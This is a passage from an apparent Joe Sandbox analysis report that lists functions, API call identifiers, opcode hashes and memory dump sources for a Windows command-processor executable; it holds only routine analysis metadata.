                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                      • String ID:
                                                      • API String ID: 1623332820-0
                                                      • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                      • Instruction ID: e7159a356838dfa925e944921bed8ffde96f7ac5a5e3fea81a3999d98a113248
                                                      • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                      • Instruction Fuzzy Hash: E211C122A08B4282DF15EB05B005239FBA0EB8DF84B989436DE0E43740DF7CE441C760
                                                      Function 00007FF7E1DC5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                      • String ID:
                                                      • API String ID: 1826527819-0
                                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction ID: d4a4e73356d4e9d5c7dbfef9c40d17cc312ba0178867650c8d9b58e6aa1ba63f
                                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction Fuzzy Hash: 7B015B31D086828AE708FB14E8463B8FA60FB8A756FC4A272D54F42395CFBC9044C762
                                                      Function 00007FF7E1DC3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7E1DB92AC), ref: 00007FF7E1DC30CA
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC30DD
                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC30F6
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC3106
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                      • String ID:
                                                      • API String ID: 1464828906-0
                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction ID: 76a66d34887542013583b6698710f7e4e74c860733a02fc8b4b6020e6b31f2fe
                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction Fuzzy Hash: 47312562E0861186E724EF15A00227EF660FB95B80FD48636DA4A433D0EEBDE845C752
                                                      Function 00007FF7E1DBCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                      • API String ID: 2221118986-3416068913
                                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction ID: c5bbe789aa92e062867f0b19c12af857f8324bbe20e35514066c1a948cae41e0
                                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction Fuzzy Hash: C211EC21B0874281EF54EB15E1463BA9250EF44BA4FD84333DE6E477D5DE7CD0808361
                                                      Function 00007FF7E1DBBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memsetwcschr
                                                      • String ID: 2$COMSPEC
                                                      • API String ID: 1764819092-1738800741
                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction ID: 551e4d2b5a574d57db68f67059a82539fb13773ec96c674970ccebef499d4380
                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction Fuzzy Hash: 17519062E0864665FB64FB25A443779A391BF44784FC84033DA4F866E5DEFCE8408763
                                                      Function 00007FF7E1DC2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                      • String ID:
                                                      • API String ID: 4254246844-0
                                                      • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                      • Instruction ID: 7f0706e067ea587e5421b703a0f6d6cfad5861e52a6cf91a1bc5c54f58284b71
                                                      • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                      • Instruction Fuzzy Hash: FA41B662A0C74696EF10EF01E446379EBA0EF85B80FC54932D94D47784DEBCE441C7A2
                                                      Function 00007FF7E1DC498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                      • String ID:
                                                      • API String ID: 2643372051-0
                                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction ID: 057bb0f319481f7d1869f57c90cecc99223403de147e35276248c35a7a42a83b
                                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction Fuzzy Hash: D9F02662A09B4281EB04FB25F402274EAE0FF4D7A0BC58236C93E43390CFBC80408251
                                                      Function 00007FF7E1DC5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _get_osfhandle$ConsoleMode
                                                      • String ID:
                                                      • API String ID: 1591002910-0
                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction ID: 216e250ae6028ed110bb4dc2e752556e834848768ba7dcd4d40c82de3a7cc494
                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction Fuzzy Hash: F1F07A35E09612DBE708EB11E846278BBA0FB8D712F849176C90E43318DFBDA6158B52
                                                      Function 00007FF7E1DC291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: DriveType
                                                      • String ID: :
                                                      • API String ID: 338552980-336475711
                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction ID: b48dd3106c801b34b5690048f068c129aba883d9bf9a6e9cffd87956715695bb
                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction Fuzzy Hash: 17E0E56361860086D720DB60E05216AF760FB8D348FC41535DA8D83724DB3CC149CF08
                                                      Function 00007FF7E1DC5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF7E1DC5B52
                                                        • Part of subcall function 00007FF7E1DC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4297
                                                        • Part of subcall function 00007FF7E1DC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC42D7
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC42FD
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC4368
                                                        • Part of subcall function 00007FF7E1DC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4380
                                                        • Part of subcall function 00007FF7E1DC4224: wcsrchr.MSVCRT ref: 00007FF7E1DC43E6
                                                        • Part of subcall function 00007FF7E1DC4224: lstrcmpW.KERNELBASE ref: 00007FF7E1DC4401
                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7E1DC5BC7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                      • String ID:
                                                      • API String ID: 497088868-0
                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction ID: edc33e9e8be908d7abf96c7fe26e3ee58fdd66b423c3ae8458e08e92c3e1645d
                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction Fuzzy Hash: 86318660B0C64252EB24F711A4527BDE251FF89B80FC45533E94E87B95DEBCE501C751
                                                      Function 00007FF7E1DC9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                      • String ID:
                                                      • API String ID: 1412018758-0
                                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                      • Instruction ID: c141a1231c0784de808bbc5dc15d594d55d3f3aa7a6d97349a80aab13a6c33dc
                                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                      • Instruction Fuzzy Hash: B9E06D01F0920B91FF1CBBA668433B592505F18B41E981832DD0E45382EEBCA092C3B2
                                                      Function 00007FF7E1DBCD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                      • Instruction ID: e5378ca871b63f4bd2260f7fbee4b83aaaac386cbc538f7548cc47fa8c93c057
                                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                      • Instruction Fuzzy Hash: 3DF08171E1864292EB04EB05F842279FBA0FB89B00BD99436D90E03358DF7CE451CB21
                                                      Function 00007FF7E1DC4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: exit
                                                      • String ID:
                                                      • API String ID: 2483651598-0
                                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                      • Instruction ID: 3b7111ea554a2566a935c7083ea295116cedc959218ebbbb6273de37de37a98d
                                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                      • Instruction Fuzzy Hash: 62C01230B0464687EB2DB731655213995A55B08201F445839C50781291DEBCD404C651
                                                      Function 00007FF7E1DC5508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: DefaultUser
                                                      • String ID:
                                                      • API String ID: 3358694519-0
                                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                      • Instruction ID: 6a13f1da88f1832a94415aa2d532eca9800ca3ee00203dc3715e58e649fc3df6
                                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                      • Instruction Fuzzy Hash: A7E0C2E2E282538AF7587E4160833B49953CB78782FC44833C60D812C54A7D3841D62A
                                                      Function 00007FF7E1DC2E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                      • Instruction ID: 949c500cb173571034c3ff60e986ffb564b611ad2e03e88f6bb6363581f32aa7
                                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                      • Instruction Fuzzy Hash: 3CF0B421B0978540EB44D756B94126A92919B88BF0B888332EA7D47BC5DF7CD452C701

                                                      Non-executed Functions

                                                      Function 00007FF7E1DB5B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
